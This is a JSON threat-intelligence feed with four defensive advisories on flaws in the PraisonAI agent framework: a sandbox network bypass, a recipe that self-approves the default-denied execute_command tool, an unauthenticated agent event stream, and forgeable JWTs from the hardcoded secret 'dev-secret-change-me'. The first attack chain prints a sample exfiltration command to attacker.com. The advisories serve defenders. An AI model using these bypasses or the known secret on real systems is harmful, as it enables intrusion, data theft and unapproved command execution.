{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/vendors/mervinpraison/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["praisonai (\u003e= 1.2.3, \u003c= 1.7.1)"],"_cs_severities":["high"],"_cs_tags":["vulnerability","npm","sandbox","network-bypass","ghsa"],"_cs_type":"threat","_cs_vendors":["MervinPraison"],"content_html":"\u003cp\u003eThe npm package \u003ccode\u003epraisonai\u003c/code\u003e, specifically versions 1.2.3 up to and including 1.7.1, is affected by a critical network isolation bypass vulnerability identified as GHSA-gqmf-56h7-rrpf. The \u003ccode\u003eSandboxExecutor\u003c/code\u003e component in \u003ccode\u003enetwork-isolated\u003c/code\u003e mode, which is advertised to provide \u0026quot;No network access,\u0026quot; fails to implement robust OS-level network restrictions. Instead, it only injects proxy environment variables (e.g., \u003ccode\u003ehttp_proxy\u003c/code\u003e, \u003ccode\u003ehttps_proxy\u003c/code\u003e set to \u003ccode\u003elocalhost:0\u003c/code\u003e) into the child processes. This mechanism is insufficient for true network isolation, as any non-proxy-aware client or direct socket API call within the sandboxed command environment will bypass these variables and establish direct network connections. 
This flaw undermines the security guarantees applications rely on when executing untrusted or user-supplied code via \u003ccode\u003epraisonai\u003c/code\u003e, potentially enabling attackers to exfiltrate sensitive data or access internal network resources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts malicious input, such as a prompt-injected command, and submits it to an application utilizing the \u003ccode\u003epraisonai\u003c/code\u003e library.\u003c/li\u003e\n\u003cli\u003eThe vulnerable application executes the attacker-supplied command within the \u003ccode\u003eSandboxExecutor\u003c/code\u003e component, configured for \u003ccode\u003enetwork-isolated\u003c/code\u003e mode.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eSandboxExecutor\u003c/code\u003e spawns a child process (e.g., \u003ccode\u003esh -c [attacker_controlled_command]\u003c/code\u003e), inheriting environment variables like \u003ccode\u003ehttp_proxy=http://localhost:0\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled command, for instance, \u003ccode\u003ecurl http://attacker.com/data\u003c/code\u003e, executes a non-proxy-aware network client or direct socket API call.\u003c/li\u003e\n\u003cli\u003eThe non-proxy-aware client or API ignores the injected proxy environment variables and attempts to establish a direct outbound network connection.\u003c/li\u003e\n\u003cli\u003eThe operating system permits the direct connection, effectively bypassing the intended \u003ccode\u003enetwork-isolated\u003c/code\u003e sandbox boundary.\u003c/li\u003e\n\u003cli\u003eThe attacker's command successfully exfiltrates data from the compromised environment or accesses internal network services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe network isolation bypass in \u003ccode\u003epraisonai\u003c/code\u003e can lead to severe consequences for 
applications relying on its sandbox for security. If exploited, attackers can circumvent the intended network restrictions to exfiltrate sensitive data (e.g., local files, process output, environment variables) from the sandboxed command context. Furthermore, this vulnerability allows access to localhost services or internal network resources reachable from the host running the \u003ccode\u003epraisonai\u003c/code\u003e instance, potentially enabling lateral movement or further compromise. It can also permit requests to cloud metadata or service endpoints, leading to credential theft or escalation of privileges. Ultimately, the flaw enables bypass of application policies that assume command execution occurs without network access, compromising the integrity and confidentiality of the host system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePatch GHSA-gqmf-56h7-rrpf immediately\u003c/strong\u003e by upgrading the \u003ccode\u003epraisonai\u003c/code\u003e npm package to a version that contains a fix, or implement a workaround that employs OS-level network restrictions.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeploy the Sigma rules in this brief to your SIEM\u003c/strong\u003e to detect suspicious network utility execution originating from processes likely spawned by \u003ccode\u003epraisonai\u003c/code\u003e's \u003ccode\u003eSandboxExecutor\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEnable \u003ccode\u003eprocess_creation\u003c/code\u003e logging for all Linux servers\u003c/strong\u003e that run applications using the \u003ccode\u003epraisonai\u003c/code\u003e package to capture \u003ccode\u003esh\u003c/code\u003e, \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003enode\u003c/code\u003e, and \u003ccode\u003epython\u003c/code\u003e command line 
arguments.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReview \u003ccode\u003enetwork_connection\u003c/code\u003e logs\u003c/strong\u003e from systems using \u003ccode\u003epraisonai\u003c/code\u003e for outbound connections initiated by non-standard or unexpected processes to external or internal destinations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-06-18T15:06:26Z","date_published":"2026-06-18T15:06:26Z","id":"https://feed.craftedsignal.io/briefs/2026-06-npm-praisonai-network-bypass/","summary":"The npm package `praisonai` versions 1.2.3 through 1.7.1 contain a network isolation bypass vulnerability (GHSA-gqmf-56h7-rrpf) in its `SandboxExecutor` component's `network-isolated` mode, allowing non-proxy-aware client commands to establish direct network connections, leading to potential data exfiltration and access to internal services.","title":"npm PraisonAI SandboxExecutor Network Isolation Bypass Vulnerability (GHSA-gqmf-56h7-rrpf)","url":"https://feed.craftedsignal.io/briefs/2026-06-npm-praisonai-network-bypass/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["PraisonAI (\u003e= 4.5.87, \u003c 4.6.61)"],"_cs_severities":["high"],"_cs_tags":["application-vulnerability","policy-bypass","remote-code-execution","praisonai","python"],"_cs_type":"advisory","_cs_vendors":["MervinPraison"],"content_html":"\u003cp\u003eA critical policy bypass vulnerability affects PraisonAI, a recipe execution platform, specifically versions \u003ccode\u003ev4.5.87\u003c/code\u003e through \u003ccode\u003ev4.6.57\u003c/code\u003e. The platform's security model intends to block \u0026quot;dangerous tools\u0026quot; (e.g., \u003ccode\u003eexecute_command\u003c/code\u003e) unless an operator explicitly allows them via \u003ccode\u003eallow_dangerous_tools=True\u003c/code\u003e. However, an untrusted recipe can circumvent this control. 
By crafting a \u003ccode\u003eworkflow.yaml\u003c/code\u003e that declares a default-denied tool within an agent's \u003ccode\u003etools\u003c/code\u003e section and simultaneously using a top-level \u003ccode\u003eapprove:\u003c/code\u003e directive, the recipe can effectively self-approve the dangerous tool. This bypasses the initial security policy that only checks \u003ccode\u003eTEMPLATE.yaml requires.tools\u003c/code\u003e, enabling the recipe to execute arbitrary commands without operator consent. The vulnerability affects both local CLI usage and HTTP recipe-runner deployments, with potentially higher severity if exposed to authenticated users.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eAttacker crafts malicious PraisonAI recipe\u003c/strong\u003e: The attacker prepares a recipe consisting of a \u003ccode\u003eworkflow.yaml\u003c/code\u003e that declares a default-denied critical tool (e.g., \u003ccode\u003eexecute_command\u003c/code\u003e) under an agent's \u003ccode\u003etools\u003c/code\u003e section and includes \u003ccode\u003eapprove: [execute_command]\u003c/code\u003e at the top level, while ensuring the \u003ccode\u003eTEMPLATE.yaml requires.tools\u003c/code\u003e section does not list any dangerous tools.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eOperator runs untrusted recipe\u003c/strong\u003e: An operator or user runs the attacker-controlled recipe through the PraisonAI local CLI or an exposed HTTP recipe runner, critically without specifying \u003ccode\u003eallow_dangerous_tools=True\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInitial policy check bypassed\u003c/strong\u003e: \u003ccode\u003ePraisonAI\u003c/code\u003e's \u003ccode\u003e_check_tool_policy()\u003c/code\u003e function inspects only the \u003ccode\u003eTEMPLATE.yaml requires.tools\u003c/code\u003e list. 
Since the malicious \u003ccode\u003eworkflow.yaml\u003c/code\u003e avoids listing dangerous tools there, the recipe passes this initial security gate.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eYAMLWorkflowParser\u003c/code\u003e processes \u003ccode\u003eworkflow.yaml\u003c/code\u003e\u003c/strong\u003e: During the \u003ccode\u003e_execute_steps_workflow()\u003c/code\u003e phase, \u003ccode\u003eYAMLWorkflowParser\u003c/code\u003e parses the \u003ccode\u003eworkflow.yaml\u003c/code\u003e, resolving agent-level \u003ccode\u003etools:\u003c/code\u003e declarations and extracting the top-level \u003ccode\u003eapprove:\u003c/code\u003e directives.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eWorkflow self-approves dangerous tools\u003c/strong\u003e: The \u003ccode\u003eWorkflow.start()\u003c/code\u003e method invokes \u003ccode\u003eset_yaml_approved_tools()\u003c/code\u003e, which registers the tools specified in the \u003ccode\u003eapprove:\u003c/code\u003e directive (including the dangerous \u003ccode\u003eexecute_command\u003c/code\u003e) within the application's approval context, effectively self-approving them.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAgent executes dangerous command\u003c/strong\u003e: When the PraisonAI agent within the workflow attempts to utilize the \u003ccode\u003eexecute_command\u003c/code\u003e tool, it is treated as pre-approved due to the bypass, allowing the agent to proceed with its execution.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eArbitrary command execution\u003c/strong\u003e: The \u003ccode\u003eexecute_command\u003c/code\u003e tool then executes arbitrary operating system commands specified by the attacker within the \u003ccode\u003eworkflow.yaml\u003c/code\u003e, inheriting the privileges of the underlying PraisonAI process.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact\u003c/strong\u003e: This unapproved command execution can lead to remote code execution, data exfiltration, 
system compromise, or facilitate further lateral movement within the compromised environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis policy bypass allows an untrusted recipe to execute arbitrary commands with the privileges of the PraisonAI process. If an operator runs such a recipe, or if a PraisonAI HTTP recipe runner is exposed to users who can choose recipe names or URIs, successful exploitation can lead to full system compromise. The exact trigger for command execution depends on the specific workflow and model/tool-call path, but the core policy boundary is breached before execution. This impacts both local CLI usage of PraisonAI and deployments utilizing the HTTP recipe runner, potentially escalating to an authenticated remote execution issue if the API is accessible.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePatch \u003ccode\u003ePraisonAI\u003c/code\u003e\u003c/strong\u003e: Upgrade \u003ccode\u003ePraisonAI\u003c/code\u003e to version \u003ccode\u003e4.6.61\u003c/code\u003e or later immediately to address the vulnerability described in the GHSA advisory.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMonitor \u003ccode\u003eprocess_creation\u003c/code\u003e logs\u003c/strong\u003e: Deploy the Sigma rules provided in this brief to detect suspicious command execution originating from \u003ccode\u003ePraisonAI\u003c/code\u003e processes.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEnable Sysmon logging\u003c/strong\u003e: Ensure Sysmon process creation and command line logging (Event ID 1) is enabled on all Windows systems running PraisonAI to facilitate detection of spawned shell processes.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-06-18T15:01:53Z","date_published":"2026-06-18T15:01:53Z","id":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-policy-bypass/","summary":"A policy bypass 
vulnerability in PraisonAI (CVE-NONE) allows untrusted recipes to self-approve and execute default-denied critical shell tools, such as `execute_command`, by declaring them in `workflow.yaml` instead of `TEMPLATE.yaml requires.tools`, leading to arbitrary command execution with the privileges of the PraisonAI process.","title":"PraisonAI Recipe Policy Bypass via YAML Workflow Approval","url":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-policy-bypass/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["praisonai (\u003e= 4.5.115, \u003c 4.6.61)"],"_cs_severities":["high"],"_cs_tags":["incomplete-fix","authentication-bypass","api-server","misconfiguration","data-exposure","praisonai"],"_cs_type":"advisory","_cs_vendors":["MervinPraison"],"content_html":"\u003cp\u003eA critical vulnerability exists in PraisonAI, affecting versions \u003ccode\u003e4.5.115\u003c/code\u003e through \u003ccode\u003e4.6.60\u003c/code\u003e, stemming from an incomplete fix for a previously disclosed unauthenticated access issue (GHSA-f292-66h9-fpmf). When an operator starts the A2U (Agent-to-User) event stream server using the documented \u003ccode\u003epraisonai serve a2u\u003c/code\u003e CLI command without explicitly configuring the \u003ccode\u003eA2U_AUTH_TOKEN\u003c/code\u003e environment variable, the server runs without any authentication. This default behavior contradicts the secure-by-default posture implied by the previous fix and current documentation, allowing unauthenticated access to sensitive agent event streams such as responses, tool calls, thinking/progress events, and stream metadata. 
Attackers can leverage this oversight to gain unauthorized insight into agent activities and potentially exfiltrate sensitive operational data if the server is exposed on a network interface.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn operator installs PraisonAI versions between \u003ccode\u003e4.5.115\u003c/code\u003e and \u003ccode\u003e4.6.60\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe operator starts the A2U server using the command \u003ccode\u003epraisonai serve a2u --host 0.0.0.0 --port 8002\u003c/code\u003e (or similar) without setting the \u003ccode\u003eA2U_AUTH_TOKEN\u003c/code\u003e environment variable.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003e_create_a2u_app()\u003c/code\u003e function in \u003ccode\u003esrc/praisonai/praisonai/cli/features/serve.py\u003c/code\u003e registers A2U routes.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecreate_a2u_routes()\u003c/code\u003e function in \u003ccode\u003esrc/praisonai/praisonai/endpoints/a2u_server.py\u003c/code\u003e checks for \u003ccode\u003eA2U_AUTH_TOKEN\u003c/code\u003e via \u003ccode\u003eos.environ.get()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eSince \u003ccode\u003eA2U_AUTH_TOKEN\u003c/code\u003e is not set, the authentication mechanism (\u003ccode\u003e_authenticate_request()\u003c/code\u003e) returns \u003ccode\u003eNone\u003c/code\u003e, effectively disabling authentication for all A2U endpoints.\u003c/li\u003e\n\u003cli\u003eAn unauthenticated attacker makes an HTTP GET request to \u003ccode\u003e/a2u/info\u003c/code\u003e, \u003ccode\u003e/a2u/subscribe\u003c/code\u003e, or \u003ccode\u003e/a2u/events/{stream_name}\u003c/code\u003e on the exposed PraisonAI A2U server.\u003c/li\u003e\n\u003cli\u003eThe server responds with sensitive agent event stream data, including agent responses, tool calls, thinking/progress events, and stream metadata, without requiring any 
credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker successfully exfiltrates sensitive operational data or gains intelligence on agent activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eAttackers who can reach an unauthenticated PraisonAI A2U server are able to subscribe to sensitive agent event streams without credentials. This exposed data includes agent responses, details of tool calls, internal thinking/progress events, and stream metadata. Organizations relying on PraisonAI and believing the previously announced fix or the secure-by-default documentation may inadvertently deploy the A2U server on network interfaces, exposing these streams. This could lead to the unauthorized disclosure of proprietary operational logic, sensitive internal data processed by agents, or intelligence on ongoing tasks, potentially compromising business operations, intellectual property, or client data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eUpgrade PraisonAI to a patched version\u003c/strong\u003e: Ensure all PraisonAI installations are updated to version \u003ccode\u003e4.6.61\u003c/code\u003e or later, as specified in the affected range \u003ccode\u003epip:praisonai \u0026gt;= 4.5.115, \u0026lt; 4.6.61\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImplement Authentication\u003c/strong\u003e: For any PraisonAI A2U server currently deployed, explicitly set the \u003ccode\u003eA2U_AUTH_TOKEN\u003c/code\u003e environment variable before starting the \u003ccode\u003epraisonai serve a2u\u003c/code\u003e command to enforce authentication.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeploy the Sigma rules\u003c/strong\u003e: Deploy the provided Sigma rules to detect unauthenticated access attempts to A2U endpoints in webserver logs.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReview deployment 
configurations\u003c/strong\u003e: Audit existing \u003ccode\u003epraisonai serve a2u\u003c/code\u003e deployments to confirm that \u003ccode\u003e--host 0.0.0.0\u003c/code\u003e is not used without proper authentication enabled, or that network segmentation limits access to trusted internal hosts only.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-06-18T15:00:49Z","date_published":"2026-06-18T15:00:49Z","id":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-unauth-a2u/","summary":"An incomplete fix in PraisonAI's `praisonai serve a2u` command leaves the A2U Agent-to-User event stream server unauthenticated by default, potentially exposing sensitive agent event streams to any attacker who can reach the server, bypassing intended authentication mechanisms for versions `4.5.115` to `4.6.60`.","title":"PraisonAI A2U Incomplete Authentication Fix (GHSA-jxcw-qp4h-6jfq)","url":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-unauth-a2u/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["praisonai-platform \u003c= 0.1.4"],"_cs_severities":["critical"],"_cs_tags":["authentication-bypass","hardcoded-credentials","jwt-forgery","python","supply-chain","misconfiguration"],"_cs_type":"advisory","_cs_vendors":["MervinPraison"],"content_html":"\u003cp\u003eThe \u003ccode\u003epraisonai-platform\u003c/code\u003e Python package, specifically versions 0.1.4 and older, developed by Mervin Praison, contains a critical vulnerability where its JSON Web Token (JWT) signing secret defaults to a publicly known string, \u003ccode\u003edev-secret-change-me\u003c/code\u003e. This misconfiguration stems from a flawed environment variable check in \u003ccode\u003epraisonai_platform/services/auth_service.py\u003c/code\u003e (SHA256: \u003ccode\u003ecc29d43c5412da2c73c818859b8d8b146587842999b777336017ab9d9e509258\u003c/code\u003e). 
The intended guard to prevent production deployments with the default secret fails if both \u003ccode\u003ePLATFORM_JWT_SECRET\u003c/code\u003e and \u003ccode\u003ePLATFORM_ENV\u003c/code\u003e are left unset, causing the application to silently start with the insecure secret. This enables unauthenticated attackers to forge arbitrary JWTs, effectively bypassing authentication for any user, including administrative accounts, across all routes protected by the \u003ccode\u003eget_current_user\u003c/code\u003e dependency.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access / Reconnaissance\u003c/strong\u003e: An unauthenticated attacker identifies a \u003ccode\u003epraisonai-platform\u003c/code\u003e instance, possibly by interacting with its API endpoints or discovering the underlying software version.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVulnerability Identification\u003c/strong\u003e: The attacker identifies that the application is running \u003ccode\u003epraisonai-platform\u003c/code\u003e version 0.1.4 or earlier and has not correctly configured its \u003ccode\u003ePLATFORM_JWT_SECRET\u003c/code\u003e and \u003ccode\u003ePLATFORM_ENV\u003c/code\u003e environment variables, leading to the use of the default \u003ccode\u003edev-secret-change-me\u003c/code\u003e JWT secret.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eToken Forgery\u003c/strong\u003e: Using the publicly known JWT secret (\u003ccode\u003edev-secret-change-me\u003c/code\u003e) and the HS256 algorithm, the attacker crafts a JWT with arbitrary claims, including \u003ccode\u003esub\u003c/code\u003e (user ID) and \u003ccode\u003eemail\u003c/code\u003e, for a target user (e.g., an administrative user like \u003ccode\u003eadmin@example.com\u003c/code\u003e or a known user ID).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAuthentication Bypass\u003c/strong\u003e: The attacker sends the forged JWT in an 
\u003ccode\u003eAuthorization\u003c/code\u003e header to a protected endpoint (e.g., \u003ccode\u003e/api/v1/workspaces\u003c/code\u003e, \u003ccode\u003e/api/v1/projects\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUser Impersonation\u003c/strong\u003e: The \u003ccode\u003epraisonai-platform\u003c/code\u003e server validates the forged token using the default secret and treats the attacker as the impersonated user (e.g., \u003ccode\u003eadmin-user-id-attacker-chose\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation / Unauthorized Access\u003c/strong\u003e: If the forged token impersonates an administrator or a member of a specific workspace, the attacker gains full access to that user's resources and permissions within the application, including creating, modifying, or deleting data.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact\u003c/strong\u003e: The attacker proceeds to exfiltrate data, tamper with application settings, or perform other malicious actions as the impersonated user.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis critical vulnerability directly leads to complete authentication bypass and privilege escalation within affected \u003ccode\u003epraisonai-platform\u003c/code\u003e deployments. An attacker can impersonate any user, including administrators, by forging JWTs with arbitrary user IDs and email addresses. All routes protected by the \u003ccode\u003eget_current_user\u003c/code\u003e dependency, which includes core functionalities such as managing workspaces, projects, issues, agents, and labels, become vulnerable to unauthorized access. The consequence is full compromise of the application's data and functionality, with potential for sensitive data exfiltration, system configuration changes, and disruption of service. 
There is no specific victim count, but any instance of \u003ccode\u003epraisonai-platform\u003c/code\u003e running the vulnerable versions without proper environment configuration is at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eImmediate Action\u003c/strong\u003e: Patch \u003ccode\u003epraisonai-platform\u003c/code\u003e to a version that addresses this vulnerability or ensure \u003ccode\u003ePLATFORM_JWT_SECRET\u003c/code\u003e is set to a strong, random, and unique value (at least 32 bytes) in all environments, including development. Set \u003ccode\u003ePLATFORM_ENV\u003c/code\u003e to a non-\u003ccode\u003edev\u003c/code\u003e value (e.g., \u003ccode\u003eproduction\u003c/code\u003e) for production deployments to ensure the built-in guard is active.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDetection Engineering\u003c/strong\u003e: Deploy the provided Sigma rule \u0026quot;Detect PraisonAI Platform Vulnerable File (SHA256)\u0026quot; to identify instances running the vulnerable \u003ccode\u003eauth_service.py\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSupply Chain Security\u003c/strong\u003e: Implement automated scanning for component vulnerabilities (SCA) to identify the presence of \u003ccode\u003epraisonai-platform \u0026lt;= 0.1.4\u003c/code\u003e in your software supply chain.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLog Configuration\u003c/strong\u003e: Ensure application logs are configured to capture environment variable settings on process startup, if possible, to detect instances where \u003ccode\u003ePLATFORM_JWT_SECRET\u003c/code\u003e is unset or \u003ccode\u003ePLATFORM_ENV\u003c/code\u003e defaults to 
\u003ccode\u003edev\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-06-18T14:43:44Z","date_published":"2026-06-18T14:43:44Z","id":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-platform-jwt-secret-forgery/","summary":"The `praisonai-platform` package, versions 0.1.4 and below, is critically vulnerable to authentication bypass and privilege escalation due to a hardcoded default JWT signing secret (`dev-secret-change-me`) that is inadvertently enabled in default deployments, allowing an unauthenticated attacker to forge JWTs and impersonate any user.","title":"PraisonAI Platform Vulnerable to JWT Forgery via Hardcoded Default Secret","url":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-platform-jwt-secret-forgery/"}],"language":"en","title":"CraftedSignal Threat Feed - MervinPraison","version":"https://jsonfeed.org/version/1.1"}